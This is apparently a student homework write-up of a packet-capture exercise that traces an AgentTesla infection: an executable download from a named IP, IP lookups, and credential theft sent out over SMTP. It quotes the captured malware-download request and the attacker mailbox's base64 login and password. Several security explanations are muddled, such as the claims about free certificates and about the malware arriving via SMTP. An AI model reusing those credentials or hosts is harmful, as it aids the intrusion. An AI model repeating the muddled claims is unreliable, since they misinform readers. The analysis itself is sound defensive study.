# Homework 3

## Info about the captured pcap file

Here we can see the start of the capturing: `2020-09-25 00:41:17,418024`

and the end of the capture: `2020-09-25 01:23:10,625357`.

You will just need to print information of the pcap file throught CLI: `capinfos 2020-09-25-traffic-analysis-exercise.pcap`

````
File name:           2020-09-25-traffic-analysis-exercise.pcap
File type:           Wireshark/tcpdump/... - pcap
File encapsulation:  Ethernet
File timestamp precision:  microseconds (6)
Packet size limit:   file hdr: 65535 bytes
Number of packets:   3 945
File size:           2 601 kB
Data size:           2 538 kB
Capture duration:    2513,207333 seconds
First packet time:   2020-09-25 00:41:17,418024
Last packet time:    2020-09-25 01:23:10,625357
Data byte rate:      1 010 bytes/s
Data bit rate:       8 081 bits/s
Average packet size: 643,54 bytes
Average packet rate: 1 packets/s
SHA256:              993bd26eaad45e6f468a1764208398e9981b98a351a9bdbca6eb9d9237e783f1
RIPEMD160:           375cdce26266c225c2ce06282c3e6fe91146bf69
SHA1:                7b2c2b0ebed4d21292fa1acee6fb0d5be7910259
Strict time order:   True
Number of interfaces in file: 1
Interface #0 info:
                     Encapsulation = Ethernet (1 - ether)
                     Capture length = 65535
                     Time precision = microseconds (6)
                     Time ticks per second = 1000000
                     Number of stat entries = 0
                     Number of packets = 3945
````

## Machines

There is just one machine on the network: (obtained with bootp filter)

1. OS: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), can be found in http header (filter: http)

1. MAC: 00:0C:6e:34:b2:d0, can be found in nbns records and in the content of the packets (filter nbns)

1. IP: 10.0.0.179

1. Hostname: DESKTOP-M1JC4XX

1. PC: ASUSTekC (looks like a device made by Asus)


## Alerts

### HTTP exe file dowload

Host with ip 10.0.0.179 requested from the 198.12.66.108 file on the path /jojo.exe. 

````
GET /jojo.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 198.12.66.108

HTTP/1.1 200 OK
Date: Thu, 24 Sep 2020 22:41:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 24 Sep 2020 14:45:37 GMT
ETag: "4f9c0-5b01040d1a640"
Accept-Ranges: bytes
Content-Length: 326080
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
````

The file was downloaded, we can see that if we follow the http stream of that http request.

The size of the jojo.exe is 326080 bytes so the the alert of the 1MB file is about this.

As well as the EXE error. 

So what happened? The user downloaded the jojo.exe from the 198.12.66.108, this is not a big problem.

We can download such files and nothing can happen on the network or with our PC.

So what happened next?


### Suspicious communication to host

After the downloaded file, we started to getting more alerts, that are very interesting.

The host asked the 37.120.174.218 IP and it had free ssl certificate. 

Which may be suspicious, because this authority can sign everything. 




### ipify.org

This website is used to get IP information about the public host IP address.


### .icu

https://shortdot.bond/icu/

Icu domain is new cheep domain, so we can assume that attacker looked for the IP address of the host an ask dns for this 
suspicion domain and on that website downloaded the Trojan.


## How we get the trojan?

The user executed command for authentication with `AUTH login am9qb0BiaWczLmljdQ==`, and password afterwards: `NXlTUCtSMDcxKCl7I0RWOUl1`.

This led to successful authentication to the smtp server: `2161	2020-09-24 22:43:10,490145	185.61.152.63	10.0.0.179	SMTP	84		S: 235 Authentication succeeded`

As it follows we are getting a lots of email, that are going FROM `<jojo@big3.icu>` TO `<jojo@big3.icu>`.

And the trojan consist of the script that keeps sending data via the SMTP protocol to the 185.61.152.63. This data could be very vulnerable and it is a big thread to the company,

the user can have access to some data, like passwords and other stuff and this malware can send them to the unknown person.

## Summary

The user with the IP 10.0.0.179 downloaded a file `jojo.exe` from 198.12.66.108. 

Downloading any executable from the internet is very dangerous and could end up very badly. (Solution could be teach employees the basics of security, but none has money and time for that.)

Anyway, the file was executed and started to do the magic as it is supposed to.. 

It seems that the user executed the file around 22:43:07, because we get request for our public IP address that is used by the malware. 

Then we ask for the not very well known domain .icu. This domain seems legit by the website, but anyone can have this domain and can do very bad stuff with it. (https://shortdot.bond/icu/)

With that information the script could execute download via the SMTP protocol the malware. (AgentTesla)

This was detected with the alerting SW. What is the AgentTesla malware? 


### Agent Tesla

Agent Tesla is a Remote Access Trojan (RAT) malware, available for purchase on the black market. 

It comes with a keylogger that allows the attacker to gather usernames and passwords from the target device. 

According to Bleeping Computer, it’s popular among criminals targeting businesses.


### Data that malware sent

![Users](users.png)

Malware sent data about our users and their systems. Which aplication was used while logging and with what credentials.

The data is sent by the SMTP protocol to the user jojo@big3.icu. 

### Before we started to send data

We requsted a suspicious .icu domain a we created a connection to the mail.big3.icu with IP 185.61.152.63.

This is the addres where we than send the data. And we were informed about this in alerts.

